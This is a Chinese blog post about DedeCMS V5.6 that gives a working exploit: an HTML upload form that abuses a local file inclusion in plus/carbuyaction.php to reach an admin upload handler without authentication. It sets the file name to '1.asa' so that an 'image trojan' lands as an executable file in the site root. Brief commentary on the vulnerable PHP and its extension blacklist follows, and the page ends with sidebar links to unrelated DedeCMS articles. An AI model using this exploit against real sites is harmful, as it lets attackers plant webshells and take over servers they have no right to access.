文档章节

DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)

mickelfeng
 mickelfeng
发布于 2016/04/19 10:13
字数 370
阅读 17
收藏 0
点赞 1
评论 0
DedeCmsV5.6 本地包含 
DedeCmsV5.6 本地包含 
http://t00ls.net/thread-8608-1-1.html 


之前就发现了这本地包含的利用方法。 
<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch"> 
<input type="hidden" name="newname" value="1.asa"> 
<input type="file" name="uploadfile"> 
<input type="submit" value="搜索" name="QuickSearchBtn"> 
</form>
上传一个图片木马(只改后辍名为图片类型就行),即可在网站根目录生成 1.asa 文件 


简单分析: 
文件:select_soft_post.php 
<?php 
if(!isset($cfg_basedir)) 
{ 
include_once(dirname(__FILE__).'/config.php'); 
} 
//config.php 是用于验证是否管理员。由于本地包含, $cfg_basedir 已经设置了值,应该跳过了验证。 


//文件名(前为手工指定, 后者自动处理) 
if(!empty($newname)) 
{ 
$filename = $newname; 
if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); 
else $fs = explode('.', $filename); 
if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 
{ 
ShowMsg("你指定的文件名被系统禁止!",'javascript:;'); 
exit(); 
} 
if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1]; 
}else{ 
$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme)); 
$fs = explode('.', $uploadfile_name); 
if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 
{ 
ShowMsg("你上传了某些可能存在不安全因素的文件,系统拒绝操作!",'javascript:;'); 
exit(); 
} 
$filename = $filename.'.'.$fs[count($fs)-1]; 
}
问题就出在 $newname 那里,没验证上传类型,但验证了非可上传类型 


//这里强制限定的某些文件类型禁止上传 
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml|zip|rar|7z|txt"; 

即可以上传非上面类型的文件,有时也并不鸡肋。。

© 著作权归作者所有

共有 人打赏支持
mickelfeng

mickelfeng

粉丝 227
博文 2556
码字总数 552015
作品 0
成都
高级程序员
详细分析下dedecms的这个劫持数据库洞子

漏洞不是我发的,这里仅仅只是分析这个漏洞的成因 今天看到微博看到dedecms出洞了,上土司看了一下,同一个问题,暂时公布的有2个位置, dede/login.php?dopost=login&validate=dcug&userid...

mickelfeng
2014/01/07
0
0
Dedecms备份还原网站有效方法

Dedecms备份还原方法为您提供3个,其实这3个dedecms网站备份恢复还原都很有效,所以不管你选择哪种,都能成功备份dedecms网站,以及dedecms网站恢复还原成功! Dedecms网站备份还原技巧1: ...

冰袋雪条火筒木冬瓜
2013/11/27
0
0
DEDE删除织梦链友情链接以及logo图片友情链接

织梦CMS v5.7,在友情链接中会自动添加“织梦链”,可以考虑删除。不过,在后台管理中,并没有发现织梦链管理,所以只能修改源文件。dede博客-598080707.NET   DedeCMS v5.7 删除友情链接中...

asqq8
昨天
0
0
DedeCms网站防挂马注意点

摘要:网页木马上次我也说了是一个比较让人头疼的问题,网站系统的程序难免会有这样那样的漏洞,这些漏洞连程序开发者都不一定知道,但是,万一漏洞被一些心怀不轨的人所利用,就会造成网页挂...

可淘2012
2011/12/25
0
0
DedeCMS+ucenter+uchome同步登录退出整合教程

现在已经完成了dedecms、ucenter、uchome的安装了现在就把dedecms及uchome通过ucenter整合到一起以实现资源整合并且两个网站的会员要实现同步登录及退出! 1.通过浏览器访问 http://127.0.0...

杨强易
2012/06/13
0
0
DedeCMS数据负载性能优化方案 简单几招让你DedeCMS提速N倍

前文介绍了DedeCMS栏目列表页实现完美分页的方法,避免了大部分重复栏目标题对搜索引擎的影响,对SEO更有利。今天,分享一下DedeCMS数据负载性能优化的方法。 接触织梦也有三年多时间了,对它...

mickelfeng
2014/05/31
0
0
DEDE隐藏内页列表等统计次数 DEDE隐藏统计标签

DEDE隐藏内页列表等统计次数 DEDE隐藏统计标签 - 发表于:DEDE技术吧 - Dede教程 有些新站想把统计代码给隐藏起来不让游客看到文档的点击次数,第一个想到的就是把统计代码给撤掉,不进行调用...

asqq8
昨天
0
0
关于织梦DEDECMS robots文件设置的想法

用织梦DEDECMS建站的站长会发现,DEDECMS自带的robots.txt文件设置很简单(开发者基于每个网站的目录结构和优化目的不同的 考虑),并不能完全满足网站的优化要求,那怎样才能结合自己网站的...

汤圆
2013/01/15
0
0
dedecms后台没有添加按钮的原因

由于dedeCMS的ckeditor不支持chrome,开始用flashFXP上传发现传一会儿就不动了,于是用8uftp上传,我发现这家伙上传虽然很快,但上传后文件发生了偏移,我明明是上传到include的,结果发现部...

有个地方叫作遥远
2013/08/27
0
2
DEDE 后台模块管理空列表的解决办法

很多用户反馈,打开插件管理,插件列表为空白,这个是织梦官方的插件服务器不稳定所致的. 官方的模块从V57发布后,基本没有发布新模块,出现此问题的解决办法,就是屏蔽掉链接官方的插件服务器更新...

吾爱
2013/06/09
0
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

pbgo: 基于Protobuf的迷你RPC/REST框架

https://www.oschina.net/p/pbgo

chai2010
23分钟前
0
0
rsync工具介绍、常用选项以及通过ssh同步

linux下的文件同步工具 rsync rsync是非常实用的一个同步工具,可以从a机器到b机器传输一个文件,也可以备份数据,系统默认没有这个工具,要使用命令 yum install -y rsync 安装。 rsync的命...

黄昏残影
39分钟前
0
0
OSChina 周四乱弹 —— 表妹要嫁人 舅妈叮嘱……

Osc乱弹歌单(2018)请戳(这里) 【今日歌曲】 @哈哈哈哈哈嗝:一定要听——The Pancakes的单曲《咁咁咁》 《咁咁咁》- The Pancakes 手机党少年们想听歌,请使劲儿戳(这里) @clouddyy :...

小小编辑
今天
145
4
流利阅读笔记30-20180719待学习

重磅:让人类得老年痴呆的竟是它? Lala 2018-07-19 1.今日导读 去年奥斯卡最佳动画长片《寻梦环游记》里有一句经典台词:“比死亡更可怕的,是遗忘”。在电影中,年迈的曾祖母会重复说一样的...

aibinxiao
今天
3
0
1.16 Linux机器相互登录

Linux机器之间以密码方式互相登录 运行命令#ssh [ip address],标准命令:#ssh [username]@ip, 如果没有写用户名,则默认为系统当前登录的用户 命令#w查看系统负载,可查看到连接到该主机的...

小丑鱼00
今天
0
0
about git flow

  昨天元芳做了git分支管理规范的分享,为了拓展大家关于git分支的认知,这里我特意再分享这两个关于git flow的链接,大家可以看一下。 Git 工作流程 Git分支管理策略   git flow本质上是...

qwfys
今天
2
0
Linux系统日志文件

/var/log/messages linux系统总日志 /etc/logrotate.conf 日志切割配置文件 参考https://my.oschina.net/u/2000675/blog/908189 dmesg命令 dmesg’命令显示linux内核的环形缓冲区信息,我们可...

chencheng-linux
今天
1
0
MacOS下给树莓派安装Raspbian系统

下载镜像 前往 树莓派官网 下载镜像。 点击 最新版Raspbian 下载最新版镜像。 下载后请,通过 访达 双击解压,或通过 unzip 命令解压。 检查下载的文件 ls -lh -rw-r--r-- 1 dingdayu s...

dingdayu
今天
1
0
spring boot使用通用mapper(tk.mapper) ,id自增和回显等问题

最近项目使用到tk.mapper设置id自增,数据库是mysql。在使用通用mapper主键生成过程中有一些问题,在总结一下。 1、UUID生成方式-字符串主键 在主键上增加注解 @Id @GeneratedValue...

北岩
今天
2
0
告警系统邮件引擎、运行告警系统

告警系统邮件引擎 cd mail vim mail.py #!/usr/bin/env python#-*- coding: UTF-8 -*-import os,sysreload(sys)sys.setdefaultencoding('utf8')import getoptimport smtplibfr......

Zhouliang6
今天
2
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

返回顶部
顶部